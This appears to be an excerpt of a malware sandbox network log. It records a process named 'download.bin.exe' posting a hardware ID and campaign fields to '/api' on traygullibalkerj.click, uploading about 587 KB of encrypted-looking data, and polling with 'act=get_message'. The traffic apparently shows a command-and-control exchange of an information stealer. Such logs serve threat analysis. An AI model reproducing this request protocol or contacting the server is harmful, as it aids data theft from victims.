2025-01-03 22:03:04 UTC	1139	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8ubl8nejfmg6jqspls4t9lasop; expires=Tue, 29 Apr 2025 15:49:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9C5hp1dsNpAAxSQcBYf%2FsuhSYVCgmRMddYzyAVHMJ6N3lACS%2BjTQ%2Fn7i6pugNyNg1xpewhy4ID8LOp29Zw56xYs%2FK71SG4xp%2BdEyNo8KNmuIqRSw7uoyTbFkeUUpTnd7PsT9vo5qf5%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646d54ad5729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2005&rtt_var=757&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2858&recv_bytes=21391&delivery_rate=1440552&cwnd=169&unsent_bytes=0&cid=a993324830eca512&ts=613&x=0"
2025-01-03 22:03:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 22:03:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:03:05 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CI2959RYGCA8K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1234 Host: traygullibalkerj.click
2025-01-03 22:03:05 UTC	1234	OUT	Data Raw: 2d 2d 43 49 32 39 35 39 52 59 47 43 41 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 36 32 30 34 45 44 31 44 46 42 45 44 44 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 43 49 32 39 35 39 52 59 47 43 41 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 49 32 39 35 39 52 59 47 43 41 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 43 49 32 39 35 39 52 59 47 43 41 Data Ascii: --CI2959RYGCA8KContent-Disposition: form-data; name="hwid"DF16204ED1DFBEDDD99589CE8AE665D5--CI2959RYGCA8KContent-Disposition: form-data; name="pid"1--CI2959RYGCA8KContent-Disposition: form-data; name="lid"WG6I6S--web55--CI2959RYGCA
2025-01-03 22:03:05 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=noncj17fvsj5onof9givo4mrlj; expires=Tue, 29 Apr 2025 15:49:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lho2WYUEgm70TSqs1Cb8cyilPjuI5VLcOIPnj8fsGGPwnkxJZWtM2XLBzA%2FbwyK59c0zDNF2DeKH0KZrcTwsSRmJ52wv3g5i6O6EFjvaP32UoQnvt6tX86n2ZSNGwZlV7W6gNxv7Z5VR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646dd0c78729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1947&rtt_var=769&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2857&recv_bytes=2152&delivery_rate=1499743&cwnd=169&unsent_bytes=0&cid=ed218895d748f64b&ts=484&x=0"
2025-01-03 22:03:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 22:03:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:03:06 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FRCJPPX0EFB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587483 Host: traygullibalkerj.click
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: 2d 2d 46 52 43 4a 50 50 58 30 45 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 36 32 30 34 45 44 31 44 46 42 45 44 44 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 46 52 43 4a 50 50 58 30 45 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 52 43 4a 50 50 58 30 45 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 46 52 43 4a 50 50 58 30 45 46 42 0d 0a 43 6f 6e 74 Data Ascii: --FRCJPPX0EFBContent-Disposition: form-data; name="hwid"DF16204ED1DFBEDDD99589CE8AE665D5--FRCJPPX0EFBContent-Disposition: form-data; name="pid"1--FRCJPPX0EFBContent-Disposition: form-data; name="lid"WG6I6S--web55--FRCJPPX0EFBCont
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f 2c 92 b3 86 c8 23 75 35 5f 13 bf 72 47 8c 5d df f5 93 78 e7 df 27 68 f0 c4 a2 b6 3e 08 26 9d 66 62 c8 6e 1b 4f 93 2d 4e e8 5e 5e 82 9c db 2c 6a d2 43 6b 10 66 83 de 7c 3e 42 Data Ascii: vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i*5.=4-?^ =0,#u5_rG]x'h>&fbnO-N^^,jCkf\|>B
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f bb 9c df aa 0d 7a a5 42 a5 17 2f 64 bb 2a 56 5f 9d 3b cc 34 ae ad e6 95 e9 b8 86 32 2d e1 e9 22 39 21 0d 72 ea 77 72 54 ba 4a f4 d6 1d 52 1f fc df 4f df 7b cf 8b b7 df 8f 86 Data Ascii: wekfDOsLRb1@g=i<74S_5[i#b\|{EW_\|OOH?);El~VsIiC4xb}^pi5vXDS3e_E3N3CiVl8~01zB/d*V_;42-"9!rwrTJRO{
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4 45 5d 55 51 6f fe 2e 00 62 70 73 18 71 93 2a 9f e8 1d 7a dc 93 5b 40 13 b0 97 0b 7c 39 82 79 81 3c ba 1d 68 df 4b d3 f9 d3 5e 0a 50 4a 9c e6 55 a1 d0 8e 9e ff 96 a3 8b fc 97 Data Ascii: 7+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa \|7r6;!_$E]UQo.bpsq*z[@\|9y<hK^PJU
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12 fb c3 8f 5e 38 01 aa b9 46 2f f2 dd 83 ee 7a 4a 3c 39 1c 86 0c 13 c5 b9 fe 59 fb 6a 3d 20 5c 80 b5 1d 0c 55 e5 43 b6 94 40 36 ce 91 fa 3b 36 bd 47 35 51 76 cd 99 da db c2 53 Data Ascii: I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn\|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F^8F/zJ<9Yj= \UC@6;6G5QvS
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a 45 fa 93 a8 08 90 f1 f7 b9 bf 44 58 a5 18 10 78 51 1c 0f e1 a9 24 bb 20 65 c7 4f 55 82 a5 a8 3d 88 7b 1e ce ec f4 9a a6 27 c1 a4 b4 62 f6 f3 54 32 22 0e b6 71 6c 0a 4e 2f f6 Data Ascii: 56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iVEDXxQ$ eOU={'bT2"qlN/
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd b2 2f 78 03 56 d5 b3 21 70 2c 8a f2 bf 4e c8 73 72 22 ff bb 8c f4 44 07 0a 92 85 e4 00 ad 1d be 7b 6a 58 b0 57 94 56 6b c6 7b f6 93 10 c9 16 6b 58 0f db 3d 04 29 51 64 48 e4 Data Ascii: @J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-/xV!p,Nsr"D{jXWVk{kX=)QdH
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca 7f 7d 63 28 e4 0a 38 58 56 dd e6 cd 9e 7e 78 20 b7 a6 73 4d 87 93 57 69 a3 39 32 38 fa e5 00 68 a7 58 82 53 21 36 04 5c f5 d8 6a 18 e7 3c 58 7f 57 e9 16 43 e9 9d 9b de 17 3e Data Ascii: PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5}c(8XV~x sMWi928hXS!6\j<XWC>
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2 2f 46 7e 4d d4 4e 42 13 e5 91 1d 1d 14 29 17 e2 4f 7a e1 52 dd 41 64 c0 63 c8 aa 31 5b 67 eb f4 3d 8a 99 f9 cf 37 09 a6 9a 92 7b 0c d1 b3 ee e5 5b 88 d5 61 23 46 26 53 77 36 Data Ascii: 8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}/F~MNB)OzRAdc1[g=7{[a#F&Sw6
2025-01-03 22:03:06 UTC	15331	OUT	Data Raw: 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6 aa a3 fb 8b 31 7e 5c 25 eb 9a 12 24 26 b8 e7 c9 1a 33 09 f9 10 5c a4 fe aa 5a 6e 96 c0 b2 c3 0d 4f 6b 9a 04 c4 cb 16 a3 6f 6b 9c a6 a3 22 02 96 5d 12 3d 82 18 b5 dc 24 49 5c Data Ascii: peR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps61~\%$&3\ZnOkok"]=$I\
2025-01-03 22:03:09 UTC	1145	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=viiam9k340shjk663e21gl737n; expires=Tue, 29 Apr 2025 15:49:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3Ia8JG9053KVVjb2fztsmKj45%2FFrTggT2B83z22JwOTqcpquTH%2F0%2BwbFGngxn5lhEzl1rS%2F4TGV6dQOiuezIBE4mp5%2FrvjbcmM6e%2FrYT7yuh9EOhEdSsQ7pH%2Fvi2SX7GudexAEg2L9d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646e4e89f43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1594&rtt_var=615&sent=336&recv=601&lost=0&retrans=0&sent_bytes=2856&recv_bytes=590073&delivery_rate=1831869&cwnd=203&unsent_bytes=0&cid=690fee75416ed54c&ts=2724&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:03:09 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: traygullibalkerj.click
2025-01-03 22:03:09 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 35 35 26 6a 3d 26 68 77 69 64 3d 44 46 31 36 32 30 34 45 44 31 44 46 42 45 44 44 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 Data Ascii: act=get_message&ver=4.0&lid=WG6I6S--web55&j=&hwid=DF16204ED1DFBEDDD99589CE8AE665D5
2025-01-03 22:03:10 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ad24djk6lmhc4ottq6i3dv54m3; expires=Tue, 29 Apr 2025 15:49:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FvOjONF83uEUDrVWyUzIxTH%2B9VS67IhNpieOdKIXaH8h4z0cJOacNLdJCFsrhG4P1B66qnl2pk6JD2bU%2F%2F1S2RBAabKJezkUkhAApbjKSf6VW%2F2MDwu8u0FKkf1VBOIs754RkzVomYKu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646f92e1043b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1556&rtt_var=592&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2856&recv_bytes=988&delivery_rate=1836477&cwnd=203&unsent_bytes=0&cid=921c486dd4195410&ts=486&x=0"
2025-01-03 22:03:10 UTC	238	IN	Data Raw: 31 61 66 32 0d 0a 57 43 44 48 34 67 64 31 6f 31 35 54 2f 67 4c 71 7a 61 76 4c 44 38 54 75 70 31 5a 56 71 34 41 36 76 6c 76 6f 35 56 63 57 31 74 30 44 57 2b 57 45 63 31 65 5a 62 33 2f 63 5a 38 6a 33 6d 75 63 74 6f 4d 79 64 64 43 7a 52 79 31 58 70 41 72 32 43 4c 33 75 6d 39 6e 4e 35 69 59 52 4d 50 4f 55 36 43 38 35 79 72 49 7a 7a 72 6a 6d 72 76 70 55 37 47 75 65 79 57 39 38 69 6a 49 63 45 54 2f 32 61 4f 57 36 46 75 47 38 32 35 78 6b 79 6b 48 44 66 71 70 72 7a 59 4b 4f 34 6c 6a 41 47 77 4e 56 34 32 6d 79 5a 67 67 73 35 74 34 64 73 56 70 32 53 64 54 2b 53 4b 68 6d 55 4f 70 6d 30 32 6f 31 69 67 71 66 71 44 43 54 4e 39 6c 66 36 41 35 47 4d 46 55 36 41 35 42 4e 79 6c 71 51 30 41 4e 49 61 61 6f 35 6f 67 2f 54 47 Data Ascii: 1af2WCDH4gd1o15T/gLqzavLD8Tup1ZVq4A6vlvo5VcW1t0DW+WEc1eZb3/cZ8j3muctoMyddCzRy1XpAr2CL3um9nN5iYRMPOU6C85yrIzzrjmrvpU7GueyW98ijIcET/2aOW6FuG825xkykHDfqprzYKO4ljAGwNV42myZggs5t4dsVp2SdT+SKhmUOpm02o1igqfqDCTN9lf6A5GMFU6A5BNylqQ0ANIaao5og/TG
2025-01-03 22:03:10 UTC	1369	IN	Data Raw: 70 6e 75 69 75 5a 63 37 42 64 50 54 43 75 30 4e 33 4c 49 43 62 4f 43 35 50 6e 47 65 71 31 4e 41 77 68 38 5a 73 48 75 6e 2f 2b 4b 61 61 59 32 55 6b 69 51 41 2f 4f 52 35 69 42 69 74 76 47 5a 63 2f 5a 34 45 44 34 4b 52 61 45 33 54 43 42 69 45 51 4b 7a 37 2b 76 78 58 2f 5a 33 64 4d 57 44 33 72 33 44 48 4b 34 53 67 4a 30 57 54 67 58 64 42 6e 59 30 73 50 39 4d 73 4d 73 39 79 70 4b 66 33 35 44 61 6c 6d 65 4e 67 45 2b 4c 4e 59 4d 38 39 6e 6f 67 54 54 75 36 30 47 6e 6a 30 31 30 55 6e 34 6d 64 67 69 33 43 75 39 4e 75 68 5a 76 65 44 79 69 55 37 2f 4c 42 58 37 69 4b 52 72 6a 68 42 6a 34 67 76 57 4b 71 53 4c 46 37 36 45 44 57 31 53 36 79 70 2f 2f 74 2f 6b 71 2f 2f 4d 32 50 45 39 67 6a 54 43 35 72 58 4e 6e 65 76 75 54 70 7a 6e 72 34 6f 4f 2b 34 76 4f 36 52 71 75 59 6e Data Ascii: pnuiuZc7BdPTCu0N3LICbOC5PnGeq1NAwh8ZsHun/+KaaY2UkiQA/OR5iBitvGZc/Z4ED4KRaE3TCBiEQKz7+vxX/Z3dMWD3r3DHK4SgJ0WTgXdBnY0sP9MsMs9ypKf35DalmeNgE+LNYM89nogTTu60Gnj010Un4mdgi3Cu9NuhZveDyiU7/LBX7iKRrjhBj4gvWKqSLF76EDW1S6yp//t/kq//M2PE9gjTC5rXNnevuTpznr4oO+4vO6RquYn
2025-01-03 22:03:10 UTC	1369	IN	Data Raw: 4c 69 65 48 51 66 36 78 67 6e 4c 4b 71 7a 63 4a 33 79 2f 35 44 56 4e 74 49 78 51 52 63 34 4f 4b 6f 52 4a 68 5a 72 79 6e 6d 69 38 67 39 64 39 66 76 4c 4f 58 50 55 53 72 6f 45 50 4a 71 61 62 47 58 69 69 31 47 67 6c 6b 54 4d 63 73 6a 43 4c 72 4e 4b 76 62 5a 65 33 2b 33 6b 5a 35 76 46 53 35 44 4f 37 6f 52 42 33 75 4f 70 74 52 2f 62 61 61 42 4c 31 62 7a 57 74 61 62 2b 50 7a 2f 78 2b 6f 37 4b 49 4e 77 79 66 39 6d 44 4f 4b 61 4c 55 49 31 79 38 35 53 74 5a 74 71 52 71 4d 2b 6f 54 43 59 39 6b 6e 4b 44 76 6b 33 61 74 72 50 38 41 62 4f 44 53 61 2f 68 6f 6e 5a 51 54 4c 36 61 33 4d 52 6d 71 6a 33 51 62 39 47 34 2b 72 6e 75 51 68 73 53 63 56 70 47 4a 33 7a 73 6c 67 4b 74 6a 38 44 32 6a 72 42 46 79 6a 75 30 6f 5a 6f 61 36 59 6b 50 4d 44 6d 47 54 54 61 62 2f 79 71 70 32 Data Ascii: 